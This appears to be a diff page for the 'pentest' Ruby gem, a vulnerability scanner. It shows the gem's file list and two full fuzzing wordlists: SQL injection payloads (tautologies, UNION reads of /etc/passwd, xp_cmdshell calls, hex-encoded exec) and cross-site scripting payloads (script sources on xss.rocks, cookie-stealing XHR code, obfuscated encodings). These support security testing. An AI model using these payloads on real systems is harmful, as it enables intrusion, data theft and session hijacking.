pentest 1.0.0
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/.gitignore +11 -0
- data/.rspec +3 -0
- data/.travis.yml +7 -0
- data/Gemfile +6 -0
- data/Gemfile.lock +75 -0
- data/LICENSE.txt +21 -0
- data/README.md +59 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/exe/pentest +6 -0
- data/lib/pentest.rb +77 -0
- data/lib/pentest/ast_utils.rb +76 -0
- data/lib/pentest/checkers.rb +21 -0
- data/lib/pentest/checkers/base_checker.rb +49 -0
- data/lib/pentest/checkers/sqli_checker.rb +226 -0
- data/lib/pentest/checkers/xss_checker.rb +87 -0
- data/lib/pentest/commandline.rb +41 -0
- data/lib/pentest/dsl.rb +15 -0
- data/lib/pentest/endpoint.rb +149 -0
- data/lib/pentest/fuzzers/sqli.txt +193 -0
- data/lib/pentest/fuzzers/xss.txt +164 -0
- data/lib/pentest/initializer.rb +8 -0
- data/lib/pentest/logger.rb +59 -0
- data/lib/pentest/payload.rb +76 -0
- data/lib/pentest/ruby_parser.rb +21 -0
- data/lib/pentest/runner.rb +58 -0
- data/lib/pentest/sql_proxy.rb +59 -0
- data/lib/pentest/version.rb +3 -0
- data/pentest.gemspec +50 -0
- metadata +218 -0
|
@@ -0,0 +1,193 @@
|
|
|
1
|
+
<>"'%;)(&+
|
|
2
|
+
|
|
|
3
|
+
!
|
|
4
|
+
?
|
|
5
|
+
/
|
|
6
|
+
//
|
|
7
|
+
//*
|
|
8
|
+
'
|
|
9
|
+
' --
|
|
10
|
+
(
|
|
11
|
+
)
|
|
12
|
+
*|
|
|
13
|
+
*/*
|
|
14
|
+
&
|
|
15
|
+
0
|
|
16
|
+
031003000270000
|
|
17
|
+
0 or 1=1
|
|
18
|
+
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
|
19
|
+
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A
|
|
20
|
+
0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
|
21
|
+
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
|
|
22
|
+
1 or 1=1
|
|
23
|
+
1;SELECT%20*
|
|
24
|
+
1 waitfor delay '0:0:10'--
|
|
25
|
+
'%20or%20''='
|
|
26
|
+
'%20or%201=1
|
|
27
|
+
')%20or%20('x'='x
|
|
28
|
+
'%20or%20'x'='x
|
|
29
|
+
%20or%20x=x
|
|
30
|
+
%20'sleep%2050'
|
|
31
|
+
%20$(sleep%2050)
|
|
32
|
+
%21
|
|
33
|
+
23 OR 1=1
|
|
34
|
+
%26
|
|
35
|
+
%27%20or%201=1
|
|
36
|
+
%28
|
|
37
|
+
%29
|
|
38
|
+
%2A%28%7C%28mail%3D%2A%29%29
|
|
39
|
+
%2A%28%7C%28objectclass%3D%2A%29%29
|
|
40
|
+
%2A%7C
|
|
41
|
+
||6
|
|
42
|
+
'||'6
|
|
43
|
+
(||6)
|
|
44
|
+
%7C
|
|
45
|
+
a'
|
|
46
|
+
admin' or '
|
|
47
|
+
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
|
|
48
|
+
' and 1 in (select var from temp)--
|
|
49
|
+
anything' OR 'x'='x
|
|
50
|
+
"a"" or 1=1--"
|
|
51
|
+
a' or 1=1--
|
|
52
|
+
"a"" or 3=3--"
|
|
53
|
+
a' or 3=3--
|
|
54
|
+
a' or 'a' = 'a
|
|
55
|
+
'%20OR
|
|
56
|
+
as
|
|
57
|
+
asc
|
|
58
|
+
a' waitfor delay '0:0:10'--
|
|
59
|
+
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
|
60
|
+
bfilename
|
|
61
|
+
char%4039%41%2b%40SELECT
|
|
62
|
+
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
|
|
63
|
+
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
|
|
64
|
+
declare @q nvarchar (4000) select @q =
|
|
65
|
+
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
|
|
66
|
+
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
|
|
67
|
+
declare @s varchar(22) select @s =
|
|
68
|
+
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e
|
|
69
|
+
delete
|
|
70
|
+
desc
|
|
71
|
+
distinct
|
|
72
|
+
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
|
73
|
+
'; exec master..xp_cmdshell
|
|
74
|
+
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
|
|
75
|
+
exec(@s)
|
|
76
|
+
'; exec ('sel' + 'ect us' + 'er')
|
|
77
|
+
exec sp
|
|
78
|
+
'; execute immediate 'sel' || 'ect us' || 'er'
|
|
79
|
+
exec xp
|
|
80
|
+
'; exec xp_regread
|
|
81
|
+
' group by userid having 1=1--
|
|
82
|
+
handler
|
|
83
|
+
having
|
|
84
|
+
' having 1=1--
|
|
85
|
+
hi or 1=1 --"
|
|
86
|
+
hi' or 1=1 --
|
|
87
|
+
"hi"") or (""a""=""a"
|
|
88
|
+
hi or a=a
|
|
89
|
+
hi' or 'a'='a
|
|
90
|
+
hi') or ('a'='a
|
|
91
|
+
'hi' or 'x'='x';
|
|
92
|
+
insert
|
|
93
|
+
like
|
|
94
|
+
limit
|
|
95
|
+
*(|(mail=*))
|
|
96
|
+
*(|(objectclass=*))
|
|
97
|
+
or
|
|
98
|
+
' or ''='
|
|
99
|
+
or 0=0 #"
|
|
100
|
+
' or 0=0 --
|
|
101
|
+
' or 0=0 #
|
|
102
|
+
" or 0=0 --
|
|
103
|
+
or 0=0 --
|
|
104
|
+
or 0=0 #
|
|
105
|
+
' or 1 --'
|
|
106
|
+
' or 1/*
|
|
107
|
+
; or '1'='1'
|
|
108
|
+
' or '1'='1
|
|
109
|
+
' or '1'='1'--
|
|
110
|
+
' or 1=1
|
|
111
|
+
' or 1=1 /*
|
|
112
|
+
' or 1=1--
|
|
113
|
+
' or 1=1--
|
|
114
|
+
'/**/or/**/1/**/=/**/1
|
|
115
|
+
‘ or 1=1 --
|
|
116
|
+
" or 1=1--
|
|
117
|
+
or 1=1
|
|
118
|
+
or 1=1--
|
|
119
|
+
or 1=1 or ""=
|
|
120
|
+
' or 1=1 or ''='
|
|
121
|
+
' or 1 in (select @@version)--
|
|
122
|
+
or%201=1
|
|
123
|
+
or%201=1 --
|
|
124
|
+
' or 2 > 1
|
|
125
|
+
' or 2 between 1 and 3
|
|
126
|
+
' or 3=3
|
|
127
|
+
‘ or 3=3 --
|
|
128
|
+
' or '7659'='7659
|
|
129
|
+
or a=a
|
|
130
|
+
or a = a
|
|
131
|
+
' or 'a'='a
|
|
132
|
+
' or a=a--
|
|
133
|
+
') or ('a'='a
|
|
134
|
+
" or "a"="a
|
|
135
|
+
) or (a=a
|
|
136
|
+
order by
|
|
137
|
+
' or (EXISTS)
|
|
138
|
+
or isNULL(1/0) /*
|
|
139
|
+
" or isNULL(1/0) /*
|
|
140
|
+
' or 'something' like 'some%'
|
|
141
|
+
' or 'something' = 'some'+'thing'
|
|
142
|
+
' or 'text' = n'text'
|
|
143
|
+
' or 'text' > 't'
|
|
144
|
+
' or uid like '%
|
|
145
|
+
' or uname like '%
|
|
146
|
+
' or 'unusual' = 'unusual'
|
|
147
|
+
' or userid like '%
|
|
148
|
+
' or user like '%
|
|
149
|
+
' or username like '%
|
|
150
|
+
' or username like char(37);
|
|
151
|
+
' or 'whatever' in ('whatever')
|
|
152
|
+
' -- &password=
|
|
153
|
+
password:*/=1--
|
|
154
|
+
PRINT
|
|
155
|
+
PRINT @@variable
|
|
156
|
+
procedure
|
|
157
|
+
replace
|
|
158
|
+
select
|
|
159
|
+
' select * from information_schema.tables--
|
|
160
|
+
' select name from syscolumns where id = (select id from sysobjects where name = tablename')--
|
|
161
|
+
' (select top 1
|
|
162
|
+
--sp_password
|
|
163
|
+
'sqlattempt1
|
|
164
|
+
(sqlattempt2)
|
|
165
|
+
'sqlvuln
|
|
166
|
+
'+sqlvuln
|
|
167
|
+
(sqlvuln)
|
|
168
|
+
sqlvuln;
|
|
169
|
+
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
|
170
|
+
to_timestamp_tz
|
|
171
|
+
truncate
|
|
172
|
+
tz_offset
|
|
173
|
+
' UNION ALL SELECT
|
|
174
|
+
' union all select @@version--
|
|
175
|
+
' union select
|
|
176
|
+
uni/**/on sel/**/ect
|
|
177
|
+
' UNION SELECT
|
|
178
|
+
' union select 1,load_file('/etc/passwd'),1,1,1;
|
|
179
|
+
) union select * from information_schema.tables;
|
|
180
|
+
' union select * from users where login = char(114,111,111,116);
|
|
181
|
+
update
|
|
182
|
+
'||UTL_HTTP.REQUEST
|
|
183
|
+
,@variable
|
|
184
|
+
@variable
|
|
185
|
+
@var select @var as var into temp end --
|
|
186
|
+
\x27UNION SELECT
|
|
187
|
+
x' AND 1=(SELECT COUNT(*) FROM tabname); --
|
|
188
|
+
x' AND email IS NULL; --
|
|
189
|
+
x' AND members.email IS NULL; --
|
|
190
|
+
x' AND userid IS NULL; --
|
|
191
|
+
x' or 1=1 or 'x'='y
|
|
192
|
+
x' OR full_name LIKE '%Bob%
|
|
193
|
+
ý or 1=1 --
|
|
@@ -0,0 +1,164 @@
|
|
|
1
|
+
'
|
|
2
|
+
<font style='color:expression(alert('XSS'))'>
|
|
3
|
+
' onmouseover=alert(/Black.Spook/)
|
|
4
|
+
' or 2=2
|
|
5
|
+
"
|
|
6
|
+
" or 202
|
|
7
|
+
";eval(unescape(location))//# %0Aalert(0)
|
|
8
|
+
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
9
|
+
"><iframe%20src="http://google.com"%%203E
|
|
10
|
+
"><img src=x onerror=prompt(1);>
|
|
11
|
+
"><img src=x onerror=window.open('https://www.google.com/');>
|
|
12
|
+
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
|
|
13
|
+
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
|
|
14
|
+
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E
|
|
15
|
+
alert(1)
|
|
16
|
+
&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
|
|
17
|
+
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
|
|
18
|
+
&#39;&#88;&#83;&#83;&#39;&#41;>
|
|
19
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
20
|
+
<img src=x:x onerror=alert(1)>
|
|
21
|
+
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
|
|
22
|
+
<SCRIPT SRC=//xss.rocks/.j>
|
|
23
|
+
'); alert('XSS
|
|
24
|
+
\";alert('XSS');//
|
|
25
|
+
<%<!--'%><script>alert(1);</script -->
|
|
26
|
+
<%73%63%72%69%70%74> %64 = %64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74(%22%64%69%76%22); %64%2e%61%70%70%65%6e%64%43%68%69%6c%64(%64%6f%63%75%6d%65%6e%74%2e%68%65%61%64%2e%63%6c%6f%6e%65%4e%6f%64%65(%74%72%75%65)); %61%6c%65%72%74(%64%2e%69%6e%6e%65%72%48%54%4d%4c%2e%6d%61%74%63%68(%22%63%6f%6f%6b%69%65 = '(%2e%2a%3f)'%22)[%31]); </%73%63%72%69%70%74>
|
|
27
|
+
<--`<img/src=` onerror=alert(1)> --!>
|
|
28
|
+
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
|
|
29
|
+
<<scr\0ipt/src=http://xss.com/xss.js></script
|
|
30
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
31
|
+
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
32
|
+
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
33
|
+
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
|
34
|
+
<a href="javascript:\u0061le%72t(1)"><button>
|
|
35
|
+
<a href="jAvAsCrIpT:alert(1)">X</a>
|
|
36
|
+
<a href=javascript:alert(document.cookie)>Click Here</a>
|
|
37
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
38
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
39
|
+
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E
|
|
40
|
+
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>
|
|
41
|
+
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
42
|
+
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>
|
|
43
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
44
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
45
|
+
<body onLoad="alert('XSS');"
|
|
46
|
+
<body onunload="javascript:alert('XSS');">
|
|
47
|
+
<body/onload=<!-->
alert(1)>
|
|
48
|
+
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>?
|
|
49
|
+
<div onmouseover='alert(1)'>DIV</div>
|
|
50
|
+
<div/onmouseover='alert(1)'> style="x:">
|
|
51
|
+
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>?
|
|
52
|
+
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ?
|
|
53
|
+
<form><button formaction=javascript:alert(1)>CLICKME
|
|
54
|
+
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
|
55
|
+
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
|
56
|
+
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ?
|
|
57
|
+
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
|
58
|
+
<iframe id=%22ifra%22 src=%22/%22></iframe> <script>ifr = document.getElementById('ifra'); ifr.contentDocument.write(%22<scr%22 %2b %22ipt>top.foo = Object.defineProperty</scr%22 %2b %22ipt>%22); foo(window, 'Safe', {value:{}}); foo(Safe, 'get', {value:function() { return document.cookie }}); alert(Safe.get());</script>
|
|
59
|
+
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
60
|
+
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
61
|
+
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
62
|
+
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
63
|
+
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe>
|
|
64
|
+
<iframe src=/ onload=eval(unescape(this.name.replace(/\/g,null))) name=fff%253Dnew%2520this.contentWindow.window.XMLHttpRequest%2528%2529%253Bfff.open%2528%2522GET%2522%252C%2522xssme2%2522%2529%253Bfff.onreadystatechange%253Dfunction%2528%2529%257Bif%2520%2528fff.readyState%253D%253D4%2520%2526%2526%2520fff.status%253D%253D200%2529%257Balert%2528fff.responseText%2529%253B%257D%257D%253Bfff.send%2528%2529%253B></iframe>
|
|
65
|
+
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>
|
|
66
|
+
<iframe src=http://xss.rocks/scriptlet.html <
|
|
67
|
+
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
|
|
68
|
+
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
|
69
|
+
<iframe/onreadystatechange=alert(1)
|
|
70
|
+
<iframe/src \/\/onload = prompt(1)
|
|
71
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
|
72
|
+
<IMG onmouseover="alert('xxs')">
|
|
73
|
+
<img src ?itworksonchrome?\/onerror = alert(1)???
|
|
74
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
|
75
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
76
|
+
<img src="/" =_=" title="onerror='prompt(1)'">
|
|
77
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
78
|
+
<IMG SRC="jav&#x09;ascript:alert('XSS');">
|
|
79
|
+
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
|
|
80
|
+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
|
|
81
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
82
|
+
<img src="javascript:alert('XSS')">
|
|
83
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
84
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
85
|
+
<img src=`xx:xx`onerror=alert(1)>
|
|
86
|
+
<img src=http://www.google.fr/images/srpr/logo3w.png onload=alert(this.ownerDocument.cookie) width=0 height= 0 /> #
|
|
87
|
+
<IMG SRC=java%00script:alert(\"XSS\")>
|
|
88
|
+
<img src=x onerror="javascript:alert('XSS')">
|
|
89
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
90
|
+
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
|
|
91
|
+
<input value=<><iframe/src=javascript:confirm(1)
|
|
92
|
+
<math><a xlink:href="//jsfiddle.net/t846h/">click
|
|
93
|
+
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>?
|
|
94
|
+
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
|
|
95
|
+
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
|
|
96
|
+
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
|
|
97
|
+
<object data=javascript:\u0061le%72t(1)>
|
|
98
|
+
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
|
99
|
+
<script for=document event=onreadystatechange>getElementById('safe123').click()</script>
|
|
100
|
+
<script itworksinallbrowsers>/*<script* */alert(1)</script ?
|
|
101
|
+
<script src="data:text/javascript,alert(1)"></script>
|
|
102
|
+
<SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT>
|
|
103
|
+
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
|
|
104
|
+
<script x> alert(1) </script 1=2
|
|
105
|
+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
|
106
|
+
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
|
|
107
|
+
<script/src=data:text/javascript,alert(1)></script> ?
|
|
108
|
+
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ????????????
|
|
109
|
+
<SCRIPT\s" != "<SCRIPT/XSS\s';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
110
|
+
<SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
|
|
111
|
+
<script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
|
|
112
|
+
<script> (function (o) { function exploit(x) { if (x !== null) alert('User cookie is ' %2B x); else console.log('fail'); } o.onclick = function (e) { e.__defineGetter__('isTrusted', function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent('MouseEvent'); e.initEvent('click', true, true); o.dispatchEvent(e); })(document.getElementById('safe123')); </script>
|
|
113
|
+
<script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
|
|
114
|
+
<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>
|
|
115
|
+
<script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
|
|
116
|
+
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script>
|
|
117
|
+
<script> var xdr = new ActiveXObject(%22Microsoft.XMLHTTP%22); xdr.open(%22get%22, %22/xssme2%3Fa=1%22, true); xdr.onreadystatechange = function() { try{ var c; if (c=xdr.responseText.match(/document.cookie = '(.*%3F)'/) ) alert(c[1]); }catch(e){} }; xdr.send(); </script>
|
|
118
|
+
<script> var+MouseEvent=function+MouseEvent(){}; MouseEvent=MouseEvent var+test=new+MouseEvent(); test.isTrusted=true; test.type='click'; document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click(test); </script>
|
|
119
|
+
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script>
|
|
120
|
+
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>
|
|
121
|
+
<script> var+xmlHttp+=+null; try+{ xmlHttp+=+new+XMLHttpRequest(); }+catch(e)+{} if+(xmlHttp)+{ xmlHttp.open('GET',+'/xssme2',+true); xmlHttp.onreadystatechange+=+function+()+{ if+(xmlHttp.readyState+==+4)+{ xmlHttp.responseText.match(/document.cookie%5Cs%2B=%5Cs%2B'(.*)'/gi); alert(RegExp.%241); } } xmlHttp.send(null); }; </script>#
|
|
122
|
+
<script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__('0', function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
|
|
123
|
+
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
|
124
|
+
<script>+-+-1-+-+alert(1)</script>
|
|
125
|
+
<script>alert(document.documentElement.innerHTML.match(/'([^']%2b)/)[1])</script>
|
|
126
|
+
<script>alert(document.getElementsByTagName('html')[0].innerHTML.match(/'([^']%2b)/)[1])</script>
|
|
127
|
+
<script>alert(document.head.childNodes[3].text)</script>
|
|
128
|
+
<script>alert(document.head.innerHTML.substr(146,20));</script>
|
|
129
|
+
<script>alert('XSS');</script>
|
|
130
|
+
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
131
|
+
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();
|
|
132
|
+
<script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
|
|
133
|
+
<script>Object.defineProperty(window, 'Safe', {value:{}});Object.defineProperty(Safe, 'get', {value:function() {return document.cookie}});alert(Safe.get())</script>
|
|
134
|
+
<script>var request = new XMLHttpRequest();request.open('GET', 'http://html5sec.org/xssme2', false);request.send(null);if (request.status == 200){alert(request.responseText.substr(150,41));}</script>
|
|
135
|
+
<script>var script = document.getElementsByTagName('script')[0]; var clone = script.childNodes[0].cloneNode(true); var ta = document.createElement('textarea'); ta.appendChild(clone); alert(ta.value.match(/cookie = '(.*?)'/)[1])</script>
|
|
136
|
+
